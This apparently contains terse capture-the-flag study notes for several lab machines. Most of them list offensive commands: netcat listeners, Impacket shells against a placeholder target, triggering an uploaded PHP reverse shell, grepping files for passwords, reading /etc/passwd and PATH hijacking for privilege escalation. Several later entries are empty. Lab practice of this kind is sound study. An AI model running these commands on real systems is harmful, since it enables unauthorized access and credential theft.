tags: SMB SQL
Write-up: archetype_write-up.pdf
System: windows
Tasks:
simple http server:
sudo python3 -m http.server 80
netcat listener:
sudo nc -lvnp 443
DOS show content of file:
c:\> more file.txt
or c:\> type file.txt
automate the enumeration process on the target system:
winPEAS
tool mssqlclient.py from the Impacket suite to get a shell to a MS SQL server:
python3 mssqlclient.py ARCHETYPE/sql_svc@{TARGET_IP} -windows-auth
tool psexec.py from the Impacket suite to get a shell as the administrator:
python3 psexec.py administrator@{TARGET_IP}
tags: PHP SUID
Write-up: ooopsie_write-up.pdf
System: linux
Tasks:
map the website using the Burp Suite proxy
prepare a reverse shell:
php-reverse-shell.php
confirm with gobuster directory and page enumeration:
gobuster dir -u http://{TARGET_IP}/ -w wordlists/directory-list-2.3-small.txt -x php
netcat listener:
nc -lvnp 1234
request shell:
http://{TARGET_IP}/uploads/php-reverse-shell.php
get a functional shell through the reverse shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
search all files in the current directory and print lines that match the pattern:
cat * | grep -i 'passw*'
cat * : read all files
-i : ignore case
check the available users on the system:
cat /etc/passwd
login as a user:
su user
find files owned by a group:
find / -group bugtracker 2>/dev/null
add the /tmp directory to the front of the PATH environment variable:
export PATH=/tmp:$PATH
check $PATH:
echo $PATH
tags: FTP SQL SUID
Write-up: vaccine_write-up.pdf
System: linux
Tasks:
tags: CVE
Write-up:
System: linux
Tasks:
tags: FTP Java PHP LFI
Write-up:
System: linux
Tasks:
tags: XXE
Write-up:
System: windows
Tasks: